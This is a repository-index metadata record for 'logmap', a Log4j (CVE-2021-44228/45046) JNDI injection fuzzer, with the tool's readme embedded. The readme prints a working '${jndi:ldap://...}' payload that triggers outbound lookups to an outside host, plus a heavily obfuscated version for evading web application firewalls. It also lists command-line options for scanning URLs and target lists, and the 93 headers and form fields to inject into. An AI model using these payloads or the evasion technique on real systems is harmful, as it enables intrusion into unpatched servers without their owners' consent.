{"id":19011042,"url":"https://github.com/zhzyker/logmap","last_synced_at":"2025-04-22T23:24:21.822Z","repository":{"id":41378810,"uuid":"438178012","full_name":"zhzyker/logmap","owner":"zhzyker","description":"Log4j jndi injection fuzz tool","archived":false,"fork":false,"pushed_at":"2021-12-24T09:42:51.000Z","size":29,"stargazers_count":70,"open_issues_count":0,"forks_count":17,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-17T14:39:33.087Z","etag":null,"topics":["cve-2021-44228","cve-2021-45046","fuzz-testing","injection","jndi","log4j2","log4shell"],"latest_commit_sha":null,"homepage":"https://github.com/zhzyker/logmap","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/zhzyker.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-14T08:41:18.000Z","updated_at":"2025-04-07T15:29:02.000Z","dependencies_parsed_at":"2022-09-05T06:51:54.529Z","dependency_job_id":null,"html_url":"https://github.com/zhzyker/logmap","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zhzyker%2Flogmap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zhzyker%2Flogmap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zhzyker%2Flogmap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/zhzyker%2Flogmap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/zhzyker","download_url":"https://codeload.github.com/zhzyker/logmap/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250338804,"owners_count":21414244,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-44228","cve-2021-45046","fuzz-testing","injection","jndi","log4j2","log4shell"],"created_at":"2024-11-08T19:13:14.213Z","updated_at":"2025-04-22T23:24:21.802Z","avatar_url":"https://github.com/zhzyker.png","language":"Python","readme":"# logmap 0.6 - Log4j jndi injection fuzz tool\n\nUsed for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path  \nUse https://log.xn--9tr.com dnslog by default, If you want to use http://ceye.io, you need to modify the domain and token  \nManually edit line [#486](https://github.com/zhzyker/logmap/blob/main/logmap.py#L486) in logmap.py to modify:  \n`args.ceye = [\"xxxxxx.ceye.io\", \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"]`  \nto   \n`args.ceye = [\"1234567.ceye.io\", \"843fd6d58a8ebede756a2b991d321a5a\"]`  \n\nThe default payload is `${{jndi:ldap://you-domain/path}}` Use `-w` or `-waf` to obfuscate the payload to bypass waf, it looks like:  \n `${${zod:as:-j}ndi:ldap:${MOH7P:-/}/${jUqr1:dlhUT:zX:Mu:rXx:-9}b71${6r3c:E8ExQh:a:iqML:-a}${jLR:s6xE:-7}${j:zzb:-3}d8${f:CF:DpXSA:-0}${7:2:yM:LnbSk:-1}c3199${4tPUvE:fj7:6K:xpqPQc:rCnYQB:-1}${G:Q:SET9R:u:9t0cc1:-1}${cLF:kENZON:e:p6f:-9}${y:i:abgu0:2cb:-3}6${35aUvK:40sxe:PaVK:cR:-d}${ysVe:byc:e:5nvP:9yVRko:-3}${Cm:DLU:-c}3f0b${iiuZKY:taWD:-4}${B:VK3:3BWv:L:-4}${KA6:GX:xxVWZg:-3}5.${6E50:-f}${iNN4:Ol:XLrqD:-3}${3Fh:T6:-6}e4${IAyoy:-d}${hMZgt:bmBCp9:bY6ofD:KR:-e}${6Ny3E:-b}.${K:Q:-d}n${FLlWGk:-s}.14${8M:-3}${W0u:LA5Z:N:-3}${t5FH:-.}e${GL:x0L72g:bqf9:6:pRQp:-u}${VIq:V:-.}${r:zFcvb:7hqmx:HTGO8:-o}r${n1ZHSo:w:-g}./Efti${Q3:-G}1}`   \nBypass reference: [StringObfuscator2.java](https://github.com/woodpecker-appstore/log4j-payload-generator/blob/master/src/main/java/me/gv7/woodpekcer/vuldb/StringObfuscator2.java) by https://github.com/c0ny1\n\nUse `-c 1` or `--cve 1` to specify the payload, support: [1:CVE-2021-44228, 2:CVE-2021-45046]  \n\nThis is just a jndi injection fuzz tool, rce or others need yourself  \n\n# Use  \n```bash\nzhzy@debian:~/$ pip3 install -r requirements.txt\nzhzy@debian:~/$ python3 logmap.py -h\n```\n\n\n![banner](https://user-images.githubusercontent.com/32918050/145970843-3d5522f6-0064-4464-b7f8-48efcd41ffbc.png)  \n\n# Options\n```bash\n  -u URL, --url URL     Target URL (e.g. http://example.com )\n  -f FILE, --file FILE  Select a target list file (e.g. list.txt )\n  -c 1, --cve 1         CVE [1:CVE-2021-44228, 2:CVE-2021-45046] default 1\n  -d 1, --dns 1         Dnslog [1:log.xn--9tr.com, 2:ceye.io] default 1\n  -p PAYLOAD            Custom payload (e.g. ${jndi:ldap://xx.dns.xx/} )\n  -t 10                 Http timeout default 10s\n  -o file               Output file\n  -w, --waf             Obfuscate the payload and bypass waf\n  --proxy PROXY         Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)\n  -h, --help            Show this help message and exit\n```\n\n# Config  \nThere are currently 93 fuzz headers  \n```\nAccept\nAccept-Charset\nAccept-Datetime\nAccept-Encoding\nAccept-Language\nAli-CDN-Real-IP\nAuthorization\nCache-Control\nCdn-Real-Ip\nCdn-Src-Ip\nCF-Connecting-IP\nClient-IP\nContact\nCookie\nDNT\nFastly-Client-Ip\nForwarded-For-Ip\nForwarded-For\nForwarded\nForwarded-Proto\nFrom\nIf-Modified-Since\nMax-Forwards\nOriginating-Ip\nOrigin\nPragma\nProxy-Client-IP\nProxy\nReferer\nTE\nTrue-Client-Ip\nTrue-Client-IP\nUpgrade\nUser-Agent\nVia\nWarning\nWL-Proxy-Client-IP\nX-Api-Version\nX-ATT-DeviceId\nX-Client-IP\nX-Cluster-Client-IP\nX-Correlation-ID\nX-Csrf-Token\nX-CSRFToken\nX-Do-Not-Track\nX-Foo-Bar\nX-Foo\nX-Forwarded-By\nX-Forwarded-For-Original\nX-Forwarded-For\nX-Forwarded-Host\nX-Forwarded\nX-Forwarded-Port\nX-Forwarded-Protocol\nX-Forwarded-Proto\nX-Forwarded-Scheme\nX-Forwarded-Server\nX-Forwarded-Ssl\nX-Forwarder-For\nX-Forward-For\nX-Forward-Proto\nX-Frame-Options\nX-From\nX-Geoip-Country\nX-Host\nX-Http-Destinationurl\nX-Http-Host-Override\nX-Http-Method-Override\nX-HTTP-Method-Override\nX-Http-Method\nX-Http-Path-Override\nX-Https\nX-Htx-Agent\nX-Hub-Signature\nX-If-Unmodified-Since\nX-Imbo-Test-Config\nX-Insight\nX-Ip\nX-Ip-Trail\nX-Leakix\nX-Original-URL\nX-Originating-IP\nX-ProxyUser-Ip\nX-Real-Ip\nX-Remote-Addr\nX-Remote-IP\nX-Requested-With\nX-Request-ID\nX-True-IP\nX-UIDH\nX-Wap-Profile\nX-WAP-Profile\nX-XSRF-TOKEN\n```\nSome body and path  \nYou can also modify him to add your own body  \n```\npayload={}\nuser={}\npass={}\nusername={}\npassword={}\nlogin={}\n... ...\n?id={}\n?username={}\n... ...\n```\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzhzyker%2Flogmap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fzhzyker%2Flogmap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fzhzyker%2Flogmap/lists"}